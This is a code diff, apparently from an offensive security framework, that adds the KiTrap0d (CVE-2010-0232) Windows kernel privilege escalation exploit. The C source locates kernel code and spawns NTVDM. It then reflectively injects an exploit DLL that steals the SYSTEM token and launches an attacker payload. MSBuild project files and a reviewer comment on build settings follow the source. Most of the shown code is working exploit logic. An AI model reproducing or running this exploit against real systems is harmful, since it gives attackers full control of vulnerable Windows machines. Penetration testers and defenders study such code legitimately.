LPVOID lpServiceBuffer = NULL;
LPVOID lpRemoteCommandLine = NULL;
char cWinDir[MAX_PATH] = { 0 };
char cVdmPath[MAX_PATH] = { 0 };
char cCommandLine[MAX_PATH] = { 0 };
DWORD dwExitCode = 0;
DWORD dwKernelBase = 0;
DWORD dwOffset = 0;
DWORD dwServiceLength = 0;
do
{
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting with HMODULE %x ...", hElevateModule);
if (lpPayload == NULL) {
BREAK_WITH_ERROR("[KITRAP0D] payload argument not specified", ERROR_BAD_ARGUMENTS);
}
if (resource_extract_raw(hElevateModule, IDR_DLL_KITRAP0D, "DLL", (LPBYTE*)&lpServiceBuffer, &dwServiceLength) != ERROR_SUCCESS) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
}
if (!dwServiceLength || !lpServiceBuffer) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
}
// 1. first get a file path to a suitable exe...
if (!elevate_via_exploit_getpath(cVdmPath, MAX_PATH)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. elevate_via_exploit_getpath failed", ERROR_FILE_NOT_FOUND);
}
// 2. Scan kernel image for the required code sequence, and find the base address...
if (!kitrap0d_scan_kernel(&dwKernelBase, &dwOffset)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_scanforcodesignature failed", ERROR_INVALID_HANDLE);
}
// 3. Invoke the NTVDM subsystem, by launching any MS-DOS executable...
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting the NTVDM subsystem by launching MS-DOS executable");
if (!kitrap0d_spawn_ntvdm(cVdmPath, &hVdm)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_spawn_ntvdm failed", ERROR_INVALID_HANDLE);
}
// 4. Use RDI to inject the elevator dll into the remote NTVDM process...
// Passing in the parameters required by exploit thread via the LoadRemoteLibraryR inject technique.
_snprintf_s(cCommandLine, sizeof(cCommandLine), sizeof(cCommandLine), "/VDM_TARGET_PID:0x%08X /VDM_TARGET_KRN:0x%08X /VDM_TARGET_OFF:0x%08X\x00", GetCurrentProcessId(), dwKernelBase, dwOffset);
// alloc some space and write the commandline which we will pass to the injected dll...
lpRemoteCommandLine = VirtualAllocEx(hVdm, NULL, strlen(cCommandLine) + 1, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (!lpRemoteCommandLine) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. VirtualAllocEx failed");
}
if (!WriteProcessMemory(hVdm, lpRemoteCommandLine, cCommandLine, strlen(cCommandLine) + 1, NULL)) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. WriteProcessMemory failed");
}
// inject the dll...
hThread = LoadRemoteLibraryR(hVdm, lpServiceBuffer, dwServiceLength, lpRemoteCommandLine);
if (!hThread) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. LoadRemoteLibraryR failed");
}
// 5. Wait for the thread to complete
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. WaitForSingleObject(%#x, INFINITE);", hThread);
WaitForSingleObject(hThread, INFINITE);
// pass some information back via the exit code to indicate what happened.
GetExitCodeThread(hThread, &dwExitCode);
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. GetExitCodeThread(%#x, %p); => %#x", hThread, &dwExitCode, dwExitCode);
switch (dwExitCode)
{
case 'VTIB':
// A data structure supplied to the kernel called VDM_TIB has to have a 'size' field that
// matches what the kernel expects.
// Try running `kd -kl -c 'uf nt!VdmpGetVdmTib;q'` and looking for the size comparison.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to find the size of the VDM_TIB structure", dwExitCode);
case 'NTAV':
// NtAllocateVirtualMemory() can usually be used to map the NULL page, which NtVdmControl()
// expects to be present.
// The exploit thread reports it didn't work.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to map the virtual 8086 address space", dwExitCode);
case 'VDMC':
// NtVdmControl() must be initialised before you can begin vm86 execution, but it failed.
// It's entirely undocumented, so you'll have to use kd to step through it and find out why
// it's failing.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports NtVdmControl() failed", dwExitCode);
case 'LPID':
// This exploit will try to transplant the token from PsInitialSystemProcess on to an
// unprivileged process owned by you.
// PsLookupProcessByProcessId() failed when trying to find your process.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports that PsLookupProcessByProcessId() failed", dwExitCode);
case FALSE:
// This probably means LoadLibrary() failed, perhaps the exploit dll could not be found?
// Verify the vdmexploit.dll file exists, is readable and is in a suitable location.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to load the injected dll", dwExitCode);
case 'w00t':
// This means the exploit payload was executed at ring0 and succeeded.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports exploitation was successful", ERROR_SUCCESS);
default:
// Unknown error. Sorry, you're on your own.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread returned an unexpected error. ", dwExitCode);
}
} while (0);
if (hVdm)
{
TerminateProcess(hVdm, 0);
CloseHandle(hVdm);
}
if (hThread)
{
CloseHandle(hThread);
}
// if we succeeded, we need to run our payload in another thread.
if (dwResult == ERROR_SUCCESS) {
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
}
return dwResult;
}
/*!
* @brief Entry point to the exploit DLL.
* @param hinstDLL Reference to the DLL's module.
* @param dwReason The reason code for the invocation.
* @param lpReserved A reserved value, used by the exploit code.
* - \c RUN_EXPLOIT_KITRAP0D - Execute the KiTrap0d exploit.
* @returns \c TRUE all the time.
* @remark The \c lpReserved value contains a number which identifies which
* exploit to invoke. This needs to be passed in from MSF, otherwise
* no exploit funtionality will be invoked.
*/
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
DWORD dwExploit = 0;
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
elevate_via_exploit_kitrap0d(hinstDLL, lpReserved);
break;
case DLL_QUERY_HMODULE:
if (lpReserved != NULL) {
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}

Binary file not shown.


@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6B678096-E18A-427A-A8A3-C268AD2E12B8}</ProjectGuid>
<RootNamespace>kitrap0d</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\kitrap0d.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\kitrap0d.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="..\common\ResourceLoader.c" />
<ClCompile Include="kitrap0d.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
<ClInclude Include="..\common\common.h" />
<ClInclude Include="..\common\ResourceLoader.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kitrap0d.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
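Review bot: The Release `PostBuildEvent` runs `copy /y` into `data\exploits\CVE-2010-0232\` without ever checking whether `editbin.exe` succeeded, and its output is sent to NUL; the Debug event goes further and ends with `exit 0`. As written, a DLL that was never patched by editbin can overwrite the shipped binary while the build still reports success. I would add `IF ERRORLEVEL 1 EXIT /B 1` directly after the editbin line in the Release command and drop `exit 0` from the Debug one. Separately, the Release settings turn off `BufferSecurityCheck` and `RandomizedBaseAddress` with no explanation; an XML comment giving the reason (presumably a constraint of the reflective loader, to be confirmed) would stop the next maintainer from copying them into unrelated projects.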


@ -0,0 +1,35 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="kitrap0d.c" />
<ClCompile Include="..\common\ResourceLoader.c">
<Filter>common</Filter>
</ClCompile>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>RDI</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="resource.h" />
<ClInclude Include="..\common\common.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\common\ResourceLoader.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
<Filter>RDI</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kitrap0d.rc" />
</ItemGroup>
<ItemGroup>
<Filter Include="common">
<UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
</Filter>
<Filter Include="RDI">
<UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>

Binary file not shown.

Some files were not shown because too many files have changed in this diff